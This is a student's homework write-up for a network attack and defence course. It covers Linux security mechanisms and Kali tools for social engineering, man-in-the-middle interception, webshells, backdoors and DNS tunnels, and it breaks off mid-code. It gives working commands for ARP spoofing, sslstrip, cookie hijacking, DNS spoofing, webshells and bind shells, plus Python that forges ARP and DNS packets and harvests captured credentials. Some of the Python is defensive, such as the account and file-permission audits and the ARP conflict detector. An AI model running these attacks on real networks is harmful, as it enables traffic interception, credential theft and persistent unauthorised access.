"Network Attack and Defense" Week 8 Homework

Experiment 1: Construction and testing of the network attack and defense environment

The attacker and the target can ping each other.

Textbook Chapter 8 Learning

  • Linux operating system development and status quo
    On the basis of a unified kernel code base, the Linux open source community has developed a large number of distributions for different user groups; popular ones include Ubuntu, Debian, Fedora, CentOS, RHEL, openSUSE and Slackware. A major reason Linux has become one of the most widely used systems is that it is open source and free.
    Linux has the following advantages: ① cross-platform hardware support (most of the kernel is written in C and it follows the portable UNIX application programming interface); ② rich software support; ③ multi-user, multi-tasking (several users can use the system at the same time); ④ reliable security (using the firewall, intrusion detection and authentication tools that ship with Linux, and patching vulnerabilities promptly, can greatly improve the security of the system); ⑤ good stability (the kernel source is tuned for standard 32-bit, or 64-bit on 64-bit CPUs, hardware to ensure stable operation); ⑥ complete Internet functionality.
    Linux system structure: a complete operating system built on the Linux kernel is called a Linux operating system. It consists of the Linux kernel, the GNU runtime libraries and tools, a command-line shell, the X Window graphical system with a desktop environment, and thousands of applications ranging from office suites, compilers and text editors to scientific tools and web servers. The Linux kernel is a typical monolithic (macro-kernel) design, unlike the micro-kernel of Minix, Linux's precursor. Inside the kernel, the device drivers of the hardware abstraction layer have full access to the hardware; they are written as modules and can be loaded and unloaded while the system runs through the LKM (loadable kernel module) mechanism. Above the hardware abstraction layer are the kernel service subsystems: process management, memory management, file system, device control and networking. These subsystems provide services through the system call interface to the user-mode GNU runtime libraries, tools, command-line shell, X Window and application software.
  • The core security mechanisms of the Linux operating system
    consist of three parts: identity authentication, authorization and access control, and security auditing.
    Linux identity authentication: Linux is a multi-user, multi-tasking operating system. It manages identities by creating users and user groups of various role types, so that several users can use the system safely at the same time.
    Linux users: in Linux the user is the subject on whose behalf processes run to carry out a task. There are three kinds: ① the root user, ② ordinary users, ③ system users. User information is stored in /etc/passwd, which is world-readable and contains the user name, the unique uid of each user, the login shell, the home directory, and so on. The password hashes are kept in /etc/shadow, which is readable only by root. A hash that still appears in the second field of /etc/passwd instead of an "x" is an immediate finding, because any local user can then crack it offline.
    Linux user groups: a user group is a collection of user accounts with common characteristics, used to simplify permission management across the whole system. Group information is stored in /etc/group, including the group name, the group gid and the list of member user names; group passwords are stored in /etc/gshadow. Use the id command to display the groups of the current user (id -a is accepted for compatibility and means the same), groupadd to add a group, and usermod -aG group_name user_name to add a user to a group. The -a (append) flag matters: usermod -G on its own replaces the user's whole supplementary group list, silently removing the user from every other group.
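As an added example (not from the textbook), the following script audits the three files just described the way an attacker or a hardening review would: it parses /etc/passwd, /etc/shadow and /etc/group and reports extra uid-0 accounts, hashes left in the world-readable /etc/passwd, empty shadow hashes, weak hash algorithms and membership of root-equivalent groups. The file contents, user names and hashes are constructed for the example; point the functions at the real files to audit a lab machine.

```python
"""Audit /etc/passwd, /etc/shadow and /etc/group for the conditions an
attacker looks for first. Added example; the sample files are constructed."""

# Constructed sample files (not taken from a real system).
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
bob:x:1001:1001:Bob:/home/bob:/bin/bash
backup2:x:0:0:maint:/root:/bin/sh
legacy:$1$abcdefgh$0123456789abcdefghijkl:1002:1002::/home/legacy:/bin/sh
"""

SHADOW = """\
root:$6$saltsalt$hashhashhashhashhashhashhashhashhashhashhashhashhashhashhashh:19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
alice:$6$saltsalt$hashhashhashhashhashhashhashhashhashhashhashhashhashhashhashh:19000:0:99999:7:::
bob::19000:0:99999:7:::
backup2:$1$abcdefgh$0123456789abcdefghijkl:19000:0:99999:7:::
"""

GROUP = """\
root:x:0:
sudo:x:27:alice
docker:x:998:bob
users:x:100:alice,bob
"""

# Membership of these groups is root-equivalent (sudo/wheel/admin via sudoers,
# docker because the daemon can mount the host filesystem into a container).
PRIVILEGED_GROUPS = {"root", "sudo", "wheel", "admin", "docker"}
WEAK_HASH_PREFIXES = ("$1$",)   # md5crypt; $5$, $6$ and $y$ are acceptable


def parse_colon_file(text):
    """Return one list of fields per non-empty line."""
    return [line.split(":") for line in text.splitlines() if line.strip()]


def audit(passwd_text, shadow_text, group_text):
    """Return a list of human-readable findings."""
    findings = []
    passwd = parse_colon_file(passwd_text)
    shadow = {fields[0]: fields[1] for fields in parse_colon_file(shadow_text)}
    groups = parse_colon_file(group_text)

    for name, pw, uid, _gid, _gecos, _home, _shell in passwd:
        if uid == "0" and name != "root":
            findings.append(f"{name}: uid 0 account other than root")
        if pw == "":
            findings.append(f"{name}: empty password field in /etc/passwd (no password needed)")
        elif pw not in ("x", "*", "!"):
            findings.append(f"{name}: password hash stored in /etc/passwd (world-readable)")
        h = shadow.get(name)
        if h is not None:
            if h == "":
                findings.append(f"{name}: empty hash in /etc/shadow (login without password)")
            elif h.startswith(WEAK_HASH_PREFIXES):
                findings.append(f"{name}: weak hash algorithm {h[:3]}")

    for gname, _pw, _gid, members in groups:
        if gname in PRIVILEGED_GROUPS:
            for member in filter(None, members.split(",")):
                findings.append(f"{member}: member of privileged group {gname}")
    return findings


def audit_files(passwd="/etc/passwd", shadow="/etc/shadow", group="/etc/group"):
    """Audit the real files; /etc/shadow needs root to read."""
    with open(passwd) as p, open(shadow) as s, open(group) as g:
        return audit(p.read(), s.read(), g.read())


if __name__ == "__main__":
    for finding in audit(PASSWD, SHADOW, GROUP):
        print(finding)
```

On the sample data the script reports six findings; the backup2 account (uid 0, md5crypt hash) and bob (empty shadow hash, docker group) are the ones that give immediate root.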
  • The main methods of intruding into Linux systems over the network
    ① Guessing and cracking the user passwords used in the authentication of the network services running on the system. ② Discovering and exploiting vulnerabilities in a listening network service, giving the attacker a local shell. ③ Attacking Linux client programs and users with web Trojans, fraudulent e-mails, Trojanized programs and other technical and social-engineering methods. ④ Attacking Linux hosts used as routers or network monitors: such a host processes traffic from the network and can be attacked with specially constructed packets, giving the attacker access.
    Linux local privilege escalation: when root privileges are needed to configure and manage the system, su or sudo is used to switch to the root account. Once an attacker has access as a restricted local user, the simplest escalation is to crack the root password and then run su or sudo. Reading the password hash file /etc/shadow itself requires root; by exploiting an arbitrary file read or write vulnerability in a service running as root, an attacker can still obtain /etc/shadow first and then escalate by cracking the hashes. The second way is to discover and exploit vulnerabilities in su or sudo themselves. The most popular local escalation route is a direct attack on an arbitrary code execution vulnerability in a program that runs with root privileges, which opens a root shell for the attacker; depending on the target program this is either a user-mode SUID privilege escalation or a Linux kernel privilege escalation. Network services and programs with the SUID bit set run with the privileges of the file's owner rather than of the caller, so that they can perform operations on system resources. The last technique exploits misconfigurations: by searching the system for sensitive files and directories that are world-writable (including writable entries on the PATH or in cron jobs) and modifying them, an attacker with only an ordinary user's privileges can make the operating system or a privileged program do something it does not expect and thereby gain an opportunity for escalation.
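The misconfiguration search described in the last paragraph is mechanical, so here is an added example (not the textbook's code) that enumerates it: setuid/setgid executables, world-writable files and directories, and world-writable PATH entries. The classification is kept in a pure function so that it can be checked against constructed mode values; the walker runs it over a real filesystem.

```python
"""Enumerate local privilege-escalation conditions: setuid/setgid files,
world-writable files and directories, world-writable PATH entries.
Added example, not from the textbook; run as an unprivileged user on a lab VM."""
import os
import stat


def classify_mode(st_mode):
    """Return the set of risk labels for a stat() st_mode value."""
    flags = set()
    if stat.S_ISREG(st_mode):
        if st_mode & stat.S_ISUID:
            flags.add("setuid")      # runs as the file owner, e.g. root
        if st_mode & stat.S_ISGID:
            flags.add("setgid")      # runs with the file's group
    if st_mode & stat.S_IWOTH:
        # A world-writable directory with the sticky bit (like /tmp) only lets
        # users remove their own entries, so it is not flagged.
        if not (stat.S_ISDIR(st_mode) and st_mode & stat.S_ISVTX):
            flags.add("world-writable")
    return flags


def scan(root, skip=("/proc", "/sys", "/dev")):
    """Walk root and yield (path, flags) for every risky entry."""
    skip = tuple(skip)
    for dirpath, dirnames, filenames in os.walk(root):
        if dirpath.startswith(skip):
            dirnames[:] = []         # do not descend into pseudo filesystems
            continue
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # never follow symlinks
            except OSError:
                continue
            if stat.S_ISLNK(st.st_mode):
                continue
            flags = classify_mode(st.st_mode)
            if flags:
                yield path, flags


def writable_path_dirs(path_env=None):
    """PATH directories any user can write to. A binary planted there runs as
    whoever invokes the command name, including root via cron or sudo."""
    if path_env is None:
        path_env = os.environ.get("PATH", "")
    risky = []
    for directory in path_env.split(os.pathsep):
        try:
            st = os.stat(directory)
        except OSError:
            continue
        if "world-writable" in classify_mode(st.st_mode):
            risky.append(directory)
    return risky


if __name__ == "__main__":
    for path, flags in scan("/"):
        print(",".join(sorted(flags)), path)
    print("writable PATH dirs:", writable_path_dirs())
```

The equivalent one-liners are `find / -perm -4000 -type f` and `find / -perm -o+w -not -type l`, but the script makes the sticky-bit exception and the PATH check explicit, which are the two places where quick manual audits usually produce false positives or miss something.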

Video learning summary

KaliSecurity - SET for exploits

The Social Engineering Toolkit (SET) is an open source, Python-driven social engineering penetration testing tool with a very rich library of attack vectors. It is usually used together with Metasploit.

1. Open the SET suite
On the command line, enter setoolkit.

Menu option 1 is social engineering attacks, 2 is Fast-Track penetration testing, and 3 is third-party modules.

2. Menu option 1: social engineering attacks
Enter 1 and press Enter; there are 11 modules: spear-phishing attack, website attack, infectious media attack, payload creation and listener, mass mailer attack, Arduino-based attack, SMS spoofing attack, wireless access point attack, QR code attack, PowerShell attack, and third-party modules.

3. Spear-phishing attack
The payload sent with the phishing message can be chosen to target different vulnerabilities.

4. Website attack framework
Continue by choosing 2, the website attack framework.

This opens a web server. When the victim visits the page and the triggering condition of the chosen vulnerability is present on their system, a backdoor is implanted. For example, the Java Applet Attack method requires the target to have a Java runtime environment. For the lure page you can either build your own or clone an existing website.
A cloned site becomes convincing when combined with sniffing and spoofing on the intranet (for example DNS spoofing), so that the victim reaches the clone under the real domain name.

5. Infectious media attack
Continue by choosing 3, the infectious media attack.

It generates a payload together with an Autorun.inf so that the exploit runs when the media is inserted and returns a shell; it can also be combined with a Metasploit backdoor. Note that Windows 7 and later do not honour AutoRun on USB flash drives, only on optical media, so this vector mostly depends on the user opening the file themselves.

6. Create payloads and listeners
Continue by selecting 4, create a payload and listener; this is similar to the payloads provided by Metasploit.

7. Mass mailer attack
Continue by selecting 5, the mass mailer attack.

It supports importing a list of addresses and sending the e-mail to everyone on the list.

8. Arduino-based attack
This is a hardware module, aimed mainly at attacks with programmable USB hardware.
9. SMS spoofing attack
Forges short messages and sends them to others, disguising the source of the SMS.
10. Wireless access point attack
Creates a fake wireless AP; all traffic of the devices that connect to it can be captured.
11. QR code attack
Encodes a malicious URL in a QR code, so that the victim who scans the code automatically opens the page.

12. PowerShell attack
The PowerShell attack module, for Windows Vista and above.
13. Fast-Track attack module
13. Fast-Track attack module

KaliSecurity - Sniffing spoofing and man-in-the-middle attacks

The man-in-the-middle routine under Linux is always the same. Below are the methods for ARP spoofing, DNS spoofing and sniffing, and session hijacking.

1. Enable IP forwarding on Kali (otherwise the victim's traffic is intercepted but not passed on, and the connection simply dies)

echo 1 > /proc/sys/net/ipv4/ip_forward
cat /proc/sys/net/ipv4/ip_forward    (should now print 1)

2. Set up sslstrip
sslstrip downgrades HTTPS to HTTP: it rewrites the https:// links and redirects that the victim receives over plain HTTP, talks HTTPS to the real server itself, and hands the victim clear text. Redirect the intercepted port 80 traffic to the port sslstrip listens on:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8081
then let sslstrip listen on port 8081:
sslstrip -l 8081
This only works when the victim's first request to a site is plain HTTP. A browser that already has the site in its HSTS cache or preload list, or a site that only ever answers on 443, never sends anything on port 80, so there is nothing to strip.
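To make the downgrade concrete, here is an added example (not sslstrip's source) modelling what the proxy on port 8081 does to each response and why HSTS stops it: links and Location headers are rewritten from https to http, the proxy remembers which hosts it downgraded so it can speak HTTPS upstream, and a browser whose HSTS cache already lists the host never produces the plain-HTTP request the attack needs. Host names and the HSTS cache contents are constructed.

```python
"""Model of the sslstrip downgrade and of the HSTS check that defeats it.
Added example; not sslstrip's code. Host names below are constructed."""
import re

HTTPS_LINK = re.compile(r"https://([A-Za-z0-9.-]+)")


class SslStripProxy:
    """Sits between the victim (plain HTTP) and the real server (HTTPS)."""

    def __init__(self):
        self.downgraded_hosts = set()

    def rewrite_response(self, headers, body):
        """Return (headers, body) with https links turned into http.

        Redirects to HTTPS (Location header) are rewritten too, so the victim
        keeps talking plain HTTP to the proxy. The proxy also drops any
        Strict-Transport-Security header it sees, so the browser never learns
        that the site wants HTTPS only."""
        def downgrade(match):
            self.downgraded_hosts.add(match.group(1).lower())
            return "http://" + match.group(1)

        new_headers = {}
        for name, value in headers.items():
            if name.lower() == "location":
                value = HTTPS_LINK.sub(downgrade, value)
            elif name.lower() == "strict-transport-security":
                continue
            new_headers[name] = value
        return new_headers, HTTPS_LINK.sub(downgrade, body)

    def upstream_scheme(self, host):
        """Scheme the proxy uses towards the real server for a victim request:
        HTTPS for hosts it downgraded, plain HTTP otherwise."""
        return "https" if host.lower() in self.downgraded_hosts else "http"


def victim_sends_plain_http(host, hsts_cache):
    """The attack needs a plain-HTTP request from the victim. If the browser
    already has the host in its HSTS cache (from an earlier HTTPS visit or the
    preload list), it rewrites the URL to https itself and nothing reaches
    port 80, so the iptables redirect and sslstrip never see the request."""
    return host.lower() not in {h.lower() for h in hsts_cache}


if __name__ == "__main__":
    proxy = SslStripProxy()
    hdrs, page = proxy.rewrite_response(
        {"Location": "https://bank.example/login",
         "Strict-Transport-Security": "max-age=31536000"},
        '<a href="https://bank.example/acct">account</a>')
    print(hdrs, page)
    print("upstream for bank.example:", proxy.upstream_scheme("bank.example"))
    print("strippable with empty HSTS cache:", victim_sends_plain_http("bank.example", set()))
    print("strippable with HSTS entry:", victim_sends_plain_http("bank.example", {"bank.example"}))
```

The defensive reading of this model: a site that sets Strict-Transport-Security over HTTPS, is on the preload list, and marks its cookies Secure leaves the proxy nothing to rewrite, because the downgrade has to happen on the victim's very first plain-HTTP request.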

3. Preparing ettercap
ettercap is a toolkit for man-in-the-middle attacks, as well known as the dsniff suite. It supports plug-ins and filter scripts and displays captured accounts and passwords directly, without manual extraction from the data. Before the first man-in-the-middle operation, configure ettercap under Kali.
The configuration file is /etc/ettercap/etter.conf. First change both ec_uid and ec_gid to 0 (open the file from the file manager or an editor, modify it and save), so that ettercap keeps the root privileges it needs to run the iptables commands.

Then, under the linux section, find the redir_command_on/redir_command_off lines for iptables, remove the leading comment character ("#"), and turn on forwarding.

Open the graphical interface with ettercap -G

and select the default eth0 as the sniffing network card.

4. Using ettercap
Open ettercap, choose Sniff > Unified sniffing, select the network card, then in the Hosts menu scan for hosts first and open the host list after the scan.

5. The dsniff suite
The dsniff suite consists mainly of arpspoof and dsniff: the former performs ARP spoofing, the latter sniffs. The attack steps are as follows.
Perform ARP spoofing:
arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host
-i is the network card; -c selects which hardware address is used when restoring the victims' ARP tables on exit (usually both); -t is the target to poison; host is the address to impersonate (usually the gateway). With -r both the target and the host are poisoned, so traffic in both directions passes through the attacker.
Sniff:
dsniff [-cdmn] [-i interface | -p pcapfile] [-s snaplen] [-f services] [-t trigger[,...]] [-r|-w savefile] [expression]
-c performs half-duplex TCP stream reassembly, needed to handle asymmetrically routed traffic, such as when arpspoof only intercepts the client's traffic towards the gateway;
-d enables debugging mode;
-f loads triggers from a file in /etc/services format (that is, the service types whose passwords are to be sniffed);
-i listens on the given network interface;
-p reads packets from a pcap file instead of the network;
-m uses the dsniff.magic file to determine the protocol automatically from the patterns defined there;
-n does not resolve IP addresses to host names;
-r reads sniffed sessions from a file saved earlier with -w;
-s sniffs at most the first snaplen bytes of each TCP connection (default 1024), which is enough to capture the user name and password of most protocols;
-t loads a comma-separated list of triggers in the format port/proto=service;
-w writes sniffed sessions to savefile instead of parsing and printing them.
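What arpspoof actually puts on the wire is a stream of forged ARP replies; the following added example (not arpspoof's source) builds one such frame with struct, parses it back, and implements the arpwatch-style check a defender uses to catch it: remember the first MAC seen for each IP and alert when a different MAC claims it. All MAC and IP addresses are constructed; send_frame needs a Linux raw socket and root and is not called by the tests.

```python
"""Build the forged ARP reply arpspoof sends and the table-based check an
ARP monitor uses to notice it. Added example; addresses are constructed."""
import socket
import struct

ETH_P_ARP = 0x0806
ARP_REPLY = 2


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def build_arp_reply(attacker_mac, spoofed_ip, victim_mac, victim_ip):
    """Frame telling victim_ip that spoofed_ip (e.g. the gateway) is at
    attacker_mac. arpspoof repeats it every couple of seconds so the victim's
    ARP cache never recovers."""
    eth = struct.pack("!6s6sH", mac_bytes(victim_mac), mac_bytes(attacker_mac), ETH_P_ARP)
    arp = struct.pack("!HHBBH6s4s6s4s",
                      1, 0x0800, 6, 4, ARP_REPLY,   # Ethernet, IPv4, addr lengths, opcode
                      mac_bytes(attacker_mac), socket.inet_aton(spoofed_ip),
                      mac_bytes(victim_mac), socket.inet_aton(victim_ip))
    return eth + arp


def parse_arp(frame):
    """Decode an Ethernet/ARP frame; None if it is not ARP."""
    if len(frame) < 42:
        return None
    _dst, _src, ethertype = struct.unpack("!6s6sH", frame[:14])
    if ethertype != ETH_P_ARP:
        return None
    _ht, _pt, _hl, _pl, op, sha, spa, tha, tpa = struct.unpack("!HHBBH6s4s6s4s", frame[14:42])
    return {"op": op,
            "sender_mac": mac_str(sha), "sender_ip": socket.inet_ntoa(spa),
            "target_mac": mac_str(tha), "target_ip": socket.inet_ntoa(tpa)}


def send_frame(iface, frame):
    """Put the frame on the wire (Linux only; needs CAP_NET_RAW / root)."""
    with socket.socket(socket.AF_PACKET, socket.SOCK_RAW) as s:
        s.bind((iface, 0))
        s.send(frame)


class ArpWatcher:
    """Defence side: remember the MAC first seen for each IP and report any
    frame in which a different MAC claims that IP."""

    def __init__(self):
        self.table = {}

    def observe(self, frame):
        arp = parse_arp(frame)
        if arp is None:
            return None
        ip, mac = arp["sender_ip"], arp["sender_mac"]
        known = self.table.setdefault(ip, mac)
        if known != mac:
            return f"ARP conflict: {ip} was {known}, now claimed by {mac}"
        return None


if __name__ == "__main__":
    watcher = ArpWatcher()
    gateway = build_arp_reply("00:11:22:33:44:55", "192.168.1.1", "aa:bb:cc:dd:ee:ff", "192.168.1.102")
    attacker = build_arp_reply("de:ad:be:ef:00:01", "192.168.1.1", "aa:bb:cc:dd:ee:ff", "192.168.1.102")
    print(watcher.observe(gateway))    # None: first sighting is trusted
    print(watcher.observe(attacker))   # conflict reported
```

The watcher's weakness is visible in the code: it trusts whichever MAC it sees first, so it has to be started before the attacker, or seeded with the gateway's real address from a static ARP entry.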

6. Session hijacking
Here cookies are used as the example of session hijacking.
Start ARP spoofing:
arpspoof -i wlan0 -t 192.168.1.1 192.168.1.102
(this tells the gateway 192.168.1.1 that 192.168.1.102 is at the attacker's MAC; add -r, or run a second arpspoof with the two addresses swapped, to poison the victim's side as well so that both directions of the traffic pass through the attacker)
Capture the packets:
tcpdump -i wlan0 -w test.cap
Wait a while until the target has presumably logged in to the website, then process the capture:
ferret -r test.cap
If the capture is usable and port forwarding is confirmed to be on, ferret writes the extracted cookies to hamster.txt. Then run
hamster
which prompts you to set the browser proxy to http://127.0.0.1:1234.
Then open hamster in the browser: http://hamster
Select the target and the likely login URL and click the link: the browser now presents the victim's cookie and is logged in without the password, which is the hijack.

7. Picture interception
With driftnet we can see the pictures of the websites the victim visits.
First start ARP spoofing with arpspoof as before, then start driftnet on the same interface:
driftnet -i wlan0
A small window pops up; whenever the target visits a website with pictures, the attacker sees them in this window.

8. DNS spoofing
With dnsspoof from the dsniff suite, or the dns_spoof plug-in of ettercap, we can carry out DNS spoofing against the victim.
Before starting, we need to prepare our own hosts file and put it somewhere accessible. Its content has the same form as the machine's own /etc/hosts: just write the address to redirect to and the domain name to spoof (the address is usually a server designated by the attacker, running a browser exploit or a Java applet attack, to obtain access to the victim's computer).
hosts file: 127.0.0.1 www.baidu.com
The above is an example of such a hosts file, which directs Baidu to this machine. Save it as hosts in the /root directory.
Then start dnsspoof: dnsspoof -i wlan0 -f /root/hosts
Wait for the victim to visit Baidu and observe the effect. dnsspoof works because the attacker sees the victim's query on the LAN and answers with the matching transaction ID before the real resolver does; the forged reply wins that race only for the names listed in the hosts file, everything else is answered normally.

9. URL monitoring
With the urlsnarf tool in the dsniff package we parse the HTTP traffic on TCP ports 80, 3128 and 8080 and dump all sniffed HTTP requests in Common Log Format (CLF). This format is used by many web servers, such as IIS and Apache, so the result can conveniently be analysed afterwards with ordinary log analysis tools.
Usage: urlsnarf [-n] [-i interface | -p pcapfile] [[-v] pattern [expression]]
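The session hijacking section above and urlsnarf both boil down to parsing the victim's plain-HTTP requests out of a capture. The following added example (not dsniff's code) does that on a constructed capture: it emits urlsnarf-style CLF lines, pulls out the cookies ferret/hamster would offer for replay, and recovers form-encoded login credentials from a POST body. The hosts, cookie values and credentials are constructed.

```python
"""Parse HTTP requests reassembled from a capture: CLF lines (urlsnarf),
session cookies (ferret/hamster) and form credentials (dsniff).
Added example, not the dsniff source; the capture is constructed."""
import urllib.parse
from datetime import datetime, timezone

CAPTURE_TIME = datetime(2024, 1, 2, 3, 4, 5, tzinfo=timezone.utc)

# Constructed: (client IP, request bytes as reassembled from the TCP stream).
CAPTURE = [
    ("192.168.1.102",
     b"GET /index.php HTTP/1.1\r\nHost: www.example.com\r\n"
     b"User-Agent: Mozilla/5.0\r\nCookie: PHPSESSID=3f2a9c1d; theme=dark\r\n\r\n"),
    ("192.168.1.102",
     b"POST /login HTTP/1.1\r\nHost: www.example.com\r\n"
     b"Referer: http://www.example.com/index.php\r\n"
     b"Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 25\r\n\r\n"
     b"user=alice&pass=hunter2%21"),
    ("192.168.1.103",
     b"GET /img/logo.png HTTP/1.1\r\nHost: cdn.example.net\r\n\r\n"),
]


def parse_request(raw):
    """Split the request line, the headers (names lower-cased) and the body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version,
            "headers": headers, "body": body}


def to_clf(client, req, when):
    """One Common Log Format line as urlsnarf writes it. A request sniffer
    never sees the status and size, so those fields are '-'."""
    h = req["headers"]
    url = f"http://{h.get('host', '-')}{req['target']}"
    stamp = when.strftime("%d/%b/%Y:%H:%M:%S %z")
    return (f'{client} - - [{stamp}] "{req["method"]} {url} {req["version"]}" - - '
            f'"{h.get("referer", "-")}" "{h.get("user-agent", "-")}"')


def session_cookies(req):
    """Cookie pairs; replaying PHPSESSID in another browser is the hijack."""
    cookies = {}
    for part in req["headers"].get("cookie", "").split(";"):
        if "=" in part:
            name, value = part.strip().split("=", 1)
            cookies[name] = value
    return cookies


def credentials_in_body(req):
    """Form logins sent over plain HTTP arrive URL-encoded in the body."""
    ctype = req["headers"].get("content-type", "")
    if ctype.startswith("application/x-www-form-urlencoded"):
        return dict(urllib.parse.parse_qsl(req["body"].decode("latin-1")))
    return {}


def clf_lines(capture=CAPTURE, when=CAPTURE_TIME):
    return [to_clf(client, parse_request(raw), when) for client, raw in capture]


def harvest(capture=CAPTURE):
    """{host: {"cookies": {...}, "credentials": {...}}} over the capture."""
    out = {}
    for _client, raw in capture:
        req = parse_request(raw)
        host = req["headers"].get("host", "-")
        entry = out.setdefault(host, {"cookies": {}, "credentials": {}})
        entry["cookies"].update(session_cookies(req))
        entry["credentials"].update(credentials_in_body(req))
    return out


if __name__ == "__main__":
    for line in clf_lines():
        print(line)
    print(harvest())
```

Everything the script recovers was sent in clear; a site that serves only HTTPS and marks its session cookie Secure and HttpOnly gives a passive sniffer none of it, which is why the sslstrip step is needed before this one against a modern target.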

10. Download monitoring
With the filesnarf tool in the dsniff suite we can pick files out of sniffed NFS traffic and dump them into the local current working directory.
Usage: filesnarf [-i interface | -p pcapfile] [[-v] pattern [expression]]

KaliSecurity - Permission Maintenance Backdoor

Permission maintenance (persistence) includes three subclasses: the Tunnel toolset, web backdoors and system backdoors. System backdoors and web backdoors are collectively called backdoors: malicious programs left behind after a penetration test to make it easy to re-enter the system.

1. Web backdoors
(1) Weevely

Weevely is a webshell tool written in Python that integrates webshell generation and connection (for security learning and teaching only; illegal use is prohibited). It can be regarded as a Linux alternative to the China Chopper (caidao) webshell manager, limited to PHP; some modules are not available against Windows targets.

Generate a PHP backdoor with weevely generate test ~/1.php, where test is the password and ~/1.php is the file written locally.

Upload the backdoor to the web server and connect with weevely:
open Metasploitable2, run nano 1.php and paste the generated file content into it, then
weevely http://192.168.75.132/1.php test
(the password is a required second argument; without it weevely cannot authenticate to the backdoor).
(2) WeBaCoo (Web Backdoor Cookie) script-kit
WeBaCoo is a small, stealthy PHP backdoor that provides a terminal for connecting to a remote web server and executing PHP code. It transmits the command output in HTTP response headers, and the shell commands are base64 encoded and hidden in cookies, so nothing obvious appears in the request or response body. Generate a webshell:
webacoo -g -o 2.php

After uploading it to the website, connect with webacoo:
webacoo -t -u http://192.168.75.132/2.php
In the webacoo terminal, a command prefixed with ":" is executed locally; otherwise the command is executed on the target through the webshell.

2. System backdoors
(1) Cymothoa system backdoor
cymothoa -p 10500 -s 0 -y 2333 injects shellcode number 0 (bind /bin/sh to a port) into the running process with pid 10500, listening on port 2333. If it succeeds, connecting to port 2333 returns a shell. Because the backdoor lives only in that process's memory, it disappears when the process exits or the host reboots.
(2) dbd can be understood as an encrypted version of nc (AES-CBC-128 with HMAC-SHA1)
Listening end: dbd -l -p 2333 -e /bin/bash -k password
Attacker: dbd 127.0.0.1 2333 -k password
(3) sbd is used in the same way as dbd.
(4) U3-Pwn
A tool used together with Metasploit payloads, driven from a simple menu. It targets removable media that presents itself as an optical drive, such as U3 USB flash drives with their emulated CD-ROM image, as well as ordinary USB disks.
(5) Intersect
Intersect generates post-exploitation scripts. Running the generated script on the target with 1.py -b starts a bind-shell backdoor; if a remote host and port were set when the script was generated, it can also be a reverse shell. Connecting to the backdoor port then returns a shell.

Tunnel for Kali Privilege Maintenance

Permission maintenance includes three subclasses: the Tunnel toolset, web backdoors and system backdoors. The Tunnel toolset contains a series of tools for establishing communication tunnels and proxies:

1. CryptCat
Netcat is known as the Swiss Army knife of network tools, but the connection it establishes is not encrypted; hence cryptcat, which adds Twofish encryption to the same interface. Its use is similar to dbd/sbd.

2. DNS2TCP
A DNS tunnel, as the name says, uses the DNS query process to establish a tunnel and transmit data.
In public places such as hotels there is usually a Wi-Fi signal, but when you visit the first website a window pops up asking for a user name and password, and only after logging in can you continue to surf (this is usually a transparent HTTP proxy, a captive portal). Sometimes, however, the DNS address obtained is valid and can be used for DNS queries; DNS tunnelling can then be used to get Internet access without logging in.
DNS tunnel principle: through a server the attacker controls (the authoritative name server of a domain they own), the DNS server of the local network forwards our data for us, encoded in query names on the way out and in answer records on the way back. Many tools implement DNS tunnels, such as OzymanDNS, tcp-over-dns, heyoka, iodine and dns2tcp.
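The DNS spoofing step above and the DNS tunnel described here both manipulate the same wire format, so one added example (not the code of dnsspoof, dns2tcp or iodine) covers both: a minimal DNS query/response builder and parser, a forge_response function that answers A queries for names in a hosts mapping the way dnsspoof does, and a tunnel_encode/tunnel_decode pair that carries arbitrary bytes in the labels of a query under an attacker-controlled domain. The hosts mapping, the IP 192.168.1.5 and the domain t.attacker.example are constructed.

```python
"""DNS wire format helpers, a dnsspoof-style forged answer, and the label
encoding a DNS tunnel uses. Added example; names and addresses are constructed."""
import base64
import socket
import struct

def encode_name(name):
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"

def decode_name(msg, off, depth=0):
    """Return (name, offset after name); follows compression pointers."""
    if depth > 5:
        raise ValueError("compression pointer loop")
    labels = []
    while True:
        n = msg[off]
        if n & 0xC0 == 0xC0:
            ptr = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            labels.append(decode_name(msg, ptr, depth + 1)[0])
            return ".".join(labels), off + 2
        off += 1
        if n == 0:
            return ".".join(labels), off
        labels.append(msg[off:off + n].decode("ascii"))
        off += n

def build_query(qname, txid=0x1234, qtype=1):
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)   # RD set, 1 question
    return header + encode_name(qname) + struct.pack("!HH", qtype, 1)

def parse_query(msg):
    txid = struct.unpack("!H", msg[:2])[0]
    qname, off = decode_name(msg, 12)
    qtype, _qclass = struct.unpack("!HH", msg[off:off + 4])
    return {"id": txid, "qname": qname, "qtype": qtype, "end": off + 4}

def forge_response(query, hosts, ttl=60):
    """dnsspoof: answer A queries for names in `hosts` with our address.
    None means the name is not ours and the real resolver should answer.
    The reply copies the victim's transaction ID; it still has to arrive
    before the genuine answer, which is why this is done on the local LAN."""
    q = parse_query(query)
    ip = hosts.get(q["qname"].lower())
    if q["qtype"] != 1 or ip is None:
        return None
    header = struct.pack("!HHHHHH", q["id"], 0x8180, 1, 1, 0, 0)  # QR, RD, RA
    question = query[12:q["end"]]
    # name is a pointer to offset 12 (the question name), type A, class IN
    answer = struct.pack("!HHHIH4s", 0xC00C, 1, 1, ttl, 4, socket.inet_aton(ip))
    return header + question + answer

def parse_response(msg):
    txid, _flags, qd, an, _ns, _ar = struct.unpack("!HHHHHH", msg[:12])
    off = 12
    for _ in range(qd):
        _, off = decode_name(msg, off)
        off += 4
    answers = []
    for _ in range(an):
        name, off = decode_name(msg, off)
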